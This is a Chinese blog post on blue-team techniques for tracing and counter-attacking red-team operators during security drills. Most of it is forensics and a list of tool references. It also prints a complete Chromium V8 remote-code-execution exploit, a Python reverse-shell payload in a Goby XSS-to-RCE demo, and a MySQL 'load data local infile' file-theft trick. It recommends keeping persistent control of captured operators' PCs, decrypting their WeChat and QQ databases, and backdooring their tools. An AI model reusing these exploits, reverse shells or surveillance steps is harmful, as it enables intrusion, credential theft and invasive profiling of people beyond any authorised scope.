HW溯源反制

windows 跳板服务器溯源

  • windows security日志/rdp 日志

里面能够拿到security或者rdp日志的ip信息,假如对方跳板是win 的话,顺藤摸瓜可以拿到对方真实连跳板的ip

HW溯源反制_第1张图片

HW溯源反制_第2张图片

 

然后需要注意的是,假如对方用的是随机的cs profile 或者自己改了profile 的话,用CS_mock 模拟上线的话,需要手工修改cookie 值。

第一步: 找到主机内存里的cs 后门进程和下载配置文件的那个url

红队常见工具反制

cs 的反制 4.0-4.4

参考: Sleeping with a Mask On (Cobalt Strike)

使用内存签名检测 Cobalt Strike | Elastic Blog

CS 4.2+开始,默认 the obfuscation is using XOR with a 13 byte keys ,除非去改beacon 源码或者用钩子绕过(https://www.arashparsa.com/hook-heaps-and-live-free/),否则从4.0-4.4 基本gg,这也被逼着要么自己写c2 要么用一些冷门的c2框架或者2开cs 避免一特征。

拿到红队人员的上线样本文件后

以下开源工具可参考使用:

https://github.com/CCob/BeaconEye (可以自己进行改下优化下该寻找内存中cs的beacon信标的工具)

https://github.com/jas502n/CS_mock或者https://github.com/hariomenkel/CobaltSpam(根据样本提取到公钥和metadata usl可以反制模拟上线打满列表的工具)

https://github.com/Sentinel-One/CobaltStrikeParser( 解析配置的工具)

其中,下载配置文件的位置主要在这:

32位的特征码:8? 68 74 74 70

64位的特征码:9? 68 74 74 70HW溯源反制_第3张图片

 2: 第二步用parse_beacon_config.py 进行解析提取cs的配置文件下载地址的文件

HW溯源反制_第4张图片 这里发现对方修改了cookie 里的值,这个值需要修改后面的cs_mockHW溯源反制_第5张图片

 HW溯源反制_第6张图片

 

  • Netstat 网络连接

    netstat 里的ip 连接也可以提取出来,进行定位真实的ip定位

  • 进程

    tasklist 里面的进程信息、运行了哪些服务和程序,特别对定位运行的c2 的server端等信息比较有用

  • chrome 、firefox、ie、360浏览器等浏览器的密码等记录

    浏览器记录、以及保存的账号密码也可作为进一步进行社工的重要依据(大家就点到为止,没必要扒光,都是江湖见的兄弟)

  • 密码管理类的凭据保存记录

    比如一些密码管理类的工具里面保存的可以尝试进行提取然后进行分析

  • 第三方应用的相关日志

    以及一些第三方应用等的日志,里面或许也会有记录相关信息,比如python 或者某些ftp 等临时开启放一些中转的的文件,里面的一些web 日志也能够分析到相关红队成员真实ip 的信息,按照心理学来说肯定自己会先访问下看服务和文件是否正常,除了受害者的信息就是红队人员自己的信息了。 那么这里可以提取相关ip 进行分析受害者有哪些、红队成员ip 有哪些。

  • frp 等代理的日志

    比如一些代理等日志,里面会记录连接的ip信息

    HW溯源反制_第7张图片

  • linux 跳板服务器溯源

  • 进程与网络连接
  • 日志记录

    每个用户下的history 日志: 记录了历史操作的命令

    /var/log/lastlog : 最后成功登入的日志记录

    /var/log/secure: 安全日志的记录

    /var/log/btmp: 登入失败信息的记录

    /var/log/wtmp: 所有用户的登入信息记录

    第三方应用日志的记录、代理frp等的日志记录

  • ​ linux 机器里,netstat 、进程与windows 分析方式类似 ,查看运行的进程和网络连接情况。

    进程查看:ps auxwwfw

    网络查看: netstat -anpHW溯源反制_第8张图片

    针对红队成员电脑pc的分析及控制

    ​ 假如反制直接拿到红队成员电脑,那么以下方式可做参考。 当然首要的就是权限维持好,长期控着该红队人员才是目的。

  • qq/wx 的id文件夹的文件
  • 这些常见社交软件,里面保存的文件夹的id 可以进一步作为定位人员的关键证据,以及相关db 数据库,拿到进行数据库解密,获取相关聊天信息对整个红队成员定位然后进行一锅端(github有相关解密代码改改就可以用,我这里就不放出来了)。

  • webshell 管理器

    红队成员电脑里的webshell 管理器的db 库,这个可以直接拖下来进行分析然后分析受害情况

  • 文档资料

    红队成员每天记录的文档报告以及云端同步的资料,这个很重要,关系到整个后续反制成果的展现。

  • 团队基础信息的深入

    根据解密的社交联系软件或者相关协作的工具平台定位分析红队人员,然后在以控制住的这个红队成员的电脑为跳板,对他们的关键设施的工具武器进行劫持植入后门或者进一步定位及控制到更多红队成员的机器权限为主(方法很多,这里就不展开细说了,用红队的思维来进行反制红队)。

3: 知道了上线的cs server 和publish key ,还有修改的cookie 值,那么进行反制

修改下cs_mock.py

HW溯源反制_第9张图片

 4: 任意进行虚假反制上线直接打满cs 列表

HW溯源反制_第10张图片

 

msf

msf 生成shellcode的yara 扫描

GitHub - thewhiteninja/yarasploit: YaraSploit is a collection of Yara rules generated from Metasploit framework shellcodes.

这里有msf 目前到6.0.12版本的生成shellcode 的yara 规则,但是存在部分误报,如果需要根据特征去匹配内存中yara 需要进一步在研究

 

nslog/httplog 等的反制

​ 针对dnslog和httplog 的反制,获取到对方的payload 的url ,然后批量使用站长之家进行批量ping 或者使用腾讯云函数进行批量访问,对方列表会满满的都是请求。(手动dog

Goby 反制

tip 来自: 赛博回忆录

打开goby开始扫描->IP详情->XSS->RCE 完成

  1. goby扫描

  2. 服务端返回一个header插入xss引用远程js文件

  3. 远程js文件里插入完整的执行代码

  4. 攻击队成员点击详情触发xss,最后rce

    server端端触发demo

    ");
    ?>

    远程引用js的exp

    (function(){
    require('child_process').exec('open /System/Applications/Calculator.app');
    require('child_process').exec('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
    })();

go 写的扫描器反制

https://github.com/alexzorin/cve-2021-34558

X-ray,goby 等使用go写的均会导致崩溃。

蚁剑的反制

  • 反向RCE漏洞: <=v2.1.6 版本 https://github.com/AntSwordProject/antSword/issues/255 、浅谈蚁剑RCE - 先知社区

  • RCE Vulnerability in View Site #256 : https://github.com/AntSwordProject/antSword/issues/256、CVE-2020-25470

  • https://github.com/AntSwordProject/antSword/issues/147

    ​ There is RCE Vulnerability in antSword ,影响:< V2.1

  • https://github.com/AntSwordProject/antSword/issues/150

    ​ Report CVE RCE Vulnerability in antSword ,影响:< V2.1

  • https://github.com/AntSwordProject/antSword/issues/151

    antSword self-XSS Vulnerability leads to Code Execution 影响:< V2.1

  • https://github.com/AntSwordProject/antSword/issues/153

    ​ Ver: <2.1 之前的版本

  • https://github.com/AntSwordProject/antSword/issues/166

    ​ 插件漏洞

  • https://github.com/AntSwordProject/antSword/issues/3

    历史悠久的版本

  • https://github.com/AntSwordProject/antSword/issues/16

    历史悠久的版本

AWVS的反制

awvs10 版本漏洞

Acunetix WVS 10 - Remote Command Execution - Windows remote Exploit

awvs 14以下的版本漏洞触发

2021年4月13日,安全研究人员Rajvardhan Agarwal在推特公布了本周第一个远程代码执行(RCE)的0Day漏洞

Chromium V8 JavaScript引擎远程代码执行

Chromium 版本的漏洞,可以构造然后执行shellcode

poc(以下公开poc仅用于蓝队反制红队使用,github也有公开代码,勿用于非法攻击行为):

替换shellcode 部分即可

ENABLE_LOG = true;
IN_WORKER = true;

// run calc and hang in a loop
var shellcode = [
    xxx
];

function print(data) {
}


var not_optimised_out = 0;
var target_function = (function (value) {
    if (value == 0xdecaf0) {
        not_optimised_out += 1;
    }
    not_optimised_out += 1;
    not_optimised_out |= 0xff;
    not_optimised_out *= 12;
});

for (var i = 0; i < 0x10000; ++i) {
    target_function(i);
}


var g_array;
var tDerivedNCount = 17 * 87481 - 8;
var tDerivedNDepth = 19 * 19;

function cb(flag) {
    if (flag == true) {
        return;
    }
    g_array = new Array(0);
    g_array[0] = 0x1dbabe * 2;
    return 'c01db33f';
}

function gc() {
    for (var i = 0; i < 0x10000; ++i) {
        new String();
    }
}

function oobAccess() {
    var this_ = this;
    this.buffer = null;
    this.buffer_view = null;

    this.page_buffer = null;
    this.page_view = null;

    this.prevent_opt = [];

    var kSlotOffset = 0x1f;
    var kBackingStoreOffset = 0xf;

    class LeakArrayBuffer extends ArrayBuffer {
        constructor() {
            super(0x1000);
            this.slot = this;
        }
    }

    this.page_buffer = new LeakArrayBuffer();
    this.page_view = new DataView(this.page_buffer);

    new RegExp({ toString: function () { return 'a' } });
    cb(true);

    class DerivedBase extends RegExp {
        constructor() {
            // var array = null;
            super(
                // at this point, the 4-byte allocation for the JSRegExp `this` object
                // has just happened.
                {
                    toString: cb
                }, 'g'
                // now the runtime JSRegExp constructor is called, corrupting the
                // JSArray.
            );

            // this allocation will now directly follow the FixedArray allocation
            // made for `this.data`, which is where `array.elements` points to.
            this_.buffer = new ArrayBuffer(0x80);
            g_array[8] = this_.page_buffer;
        }
    }

    // try{
    var derived_n = eval(`(function derived_n(i) {
        if (i == 0) {
            return DerivedBase;
        }

        class DerivedN extends derived_n(i-1) {
            constructor() {
                super();
                return;
                ${"this.a=0;".repeat(tDerivedNCount)}
            }
        }

        return DerivedN;
    })`);

    gc();


    new (derived_n(tDerivedNDepth))();

    this.buffer_view = new DataView(this.buffer);
    this.leakPtr = function (obj) {
        this.page_buffer.slot = obj;
        return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
    }

    this.setPtr = function (addr) {
        this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
    }

    this.read32 = function (addr) {
        this.setPtr(addr);
        return this.page_view.getUint32(0, true, ...this.prevent_opt);
    }

    this.write32 = function (addr, value) {
        this.setPtr(addr);
        this.page_view.setUint32(0, value, true, ...this.prevent_opt);
    }

    this.write8 = function (addr, value) {
        this.setPtr(addr);
        this.page_view.setUint8(0, value, ...this.prevent_opt);
    }

    this.setBytes = function (addr, content) {
        for (var i = 0; i < content.length; i++) {
            this.write8(addr + i, content[i]);
        }
    }
    return this;
}

function trigger() {
    var oob = oobAccess();

    var func_ptr = oob.leakPtr(target_function);
    print('[*] target_function at 0x' + func_ptr.toString(16));

    var kCodeInsOffset = 0x1b;

    var code_addr = oob.read32(func_ptr + kCodeInsOffset);
    print('[*] code_addr at 0x' + code_addr.toString(16));

    oob.setBytes(code_addr, shellcode);

    target_function(0);
}

try{
    print("start running");
    trigger();
}catch(e){
    print(e);
}

那时候4月,wx 还没强制更新,内置的是存在问题的Chromium 内核版本,也还能用于wx 进行钓鱼利用,现在很多红队人员的渗透工具不一定更新的是最新版本的,那么这个漏洞运气好的话也还能钓部分红队人员。

HW溯源反制_第11张图片

 

Git 源码漏洞反制

https://drivertom.blogspot.com/2021/08/git.html(别想偷我源码:通用的针对源码泄露利用程序的反制(常见工具集体沦陷))

构造../ ,然后把后门写到启动项或者定时任务进行getshell。

GitHack https://github.com/lijiejie/GitHack
GitHack https://github.com/BugScanTeam/GitHack
dumpall https://github.com/0xHJK/dumpall
GitHacker https://github.com/WangYihang/GitHacker
dvcs-ripper https://github.com/kost/dvcs-ripper
git-dumper https://github.com/arthaud/git-dumper
  1. 对于类unix系统可以写入crontab,增加定时任务,反弹shell回来
  2. 对于Windows系统可以写入开始菜单启动项,或者dll劫持
  3. 可以把攻击工具的脚本给替换掉,下次执行就能上线

    除此之外,可以通过发来的包的TTL值判断操作系统(Windows默认是128,Linux是64或者255),实现更精准的反制

webshell 后门反制

直接传上来的一些大马,可以先关闭服务器进行隔离,然后在他的大马里进行“加料”隔离上线,当对方在连接进来的时候先获取对方的user-agent, 利用一些chrome 、fireofx 等一些常见浏览器的day ,构建shellcode 进行浏览器逃逸执行反制。

数据库连接的反制

MySQL中 load data local infile '/etc/passwd' into table test fields terminated by '\n';语句可以读取客户端本地文件并插进表中,那么我们可以伪造一个恶意的服务器,向连接服务器的客户端发送读取文件的payload 。 比如读取攻击者的微信id、ntlm hash

溯源反制之MySQL蜜罐研究

https://github.com/qigpig/MysqlHoneypot

远程桌面连接mstsc/共享的反制

当对方为了方便mstsc 连接进来,当然场景不限于mstsc ,比如对方开启了vmware 虚拟机等的文件共享,然后往对方启动项丢一个可执行文件,直接就可以rce 了。

HW溯源反制_第12张图片

蜜罐

蜜罐就不多说了,基本甲方都会部署内外网遍地的蜜罐,hw必备的。

JSONP/webrtc 获取真实ip及社交账号

webRTC获取ip地址_Neil-的博客-CSDN博客

利用社交账号精准溯源的蜜罐技术

利用 webrtc 获取真实 ip,别人走了sock 代理的话,这个一样可以获取到真实ip(部分代理软件还未支持udp,socks5代理只支持到了tcp协议),因为是udp 协议的,所以能直接获取到真实ip。

除非红队人员对浏览器进行了优化

禁用WebRTC
chrome用这个插件:WebRTC Leak Prevent
firefox:about:config-->media.peerconnection.enabled --〉 false

demo



    
        
    
    
        Remote Addr: 
        

WebRTC

Your local IP addresses:

    Your public IP addresses:

      Your IPv6 addresses:

        JSONP 探针:

        ​ 现在基本的蜜罐都具备该功能了,也就不多说了,溯源身份反制的利器,拼的就是各大src 不修复的JSONP 接口。

        类的主动钓鱼反制

        现在基本做个 的2级域名蜜罐,没有哪个红队不关注这个的,那么利用这个心里,可以这样进行反制。

        360connect / sangfor 这些连接的客户端在连接的时候都会下 dll 进去,那么针对这个,我们可以做个dll 劫持,正常用户使用的时候,也是会按照这个企业的配置,下发这个企业的 dll ,因为证书自签的,所以蜜罐上面可以自己签一个sabgfor的证书,攻击者也不会发现有啥不一样的。(Medicean表哥提供的思路)

        ioc类信息的溯源思路

        ip 溯源

        排除cdn等的干扰拿到真实ip 后

        常规手法:whois 、域名反查 、反渗透

        小tip:使用威胁情报进行综合分析,查看该ip他人对该ip 打的标签、历史解析记录、历史变更记录、以及该ip上面关联的相关样本,这些能够获取到进行进一步关联分析

        域名溯源

        历史解析记录、以及whois 手法的溯源关联

        红队人员溯源

        常规社交溯源流程(常见的社交论坛、招聘类、app进行身份定位)

        病毒源码溯源

        拿到样本,有些样本里面很可能直接会有debug 信息、以及编译时未处理的编译信息,里面可以结合进一步进行溯源跟踪、以及结合VirusTotal 进一步进行追踪。

        举例: 比如go 编写的样本,一些信息是能够直接拿到作为进一步溯源分析的方法。

        https://github.com/boy-hack/go-strip

        手机号溯源

        可以通过各类社交接口进行定位

        部分资料参考

        反制爬虫之 Burp Suite 远程命令执行

        精确判断网站访问者是否是黑客的方法

        溯源反制思路整合

        溯源反制之MySQL蜜罐研究

        https://www.52pojie.cn/thread-954500-1-1.html

        [原创]微信 PC端 数据库 自动解密-编程技术-看雪论坛-安全社区|安全招聘|bbs.pediy.com

        红蓝对抗-反制_Shanfenglan7的博客-CSDN博客_红蓝对抗演练脚本

        https://mp.weixin.qq.com/s/tl17-Qz-VXpSlZtZWDgeHg

        【热剩饭】获取代理池背后攻击者的真实IP

        红蓝对抗系列之浅谈蓝队反制红队的手法一二 - 先知社区

        你可能感兴趣的:(Web,安全,服务器,网络,运维)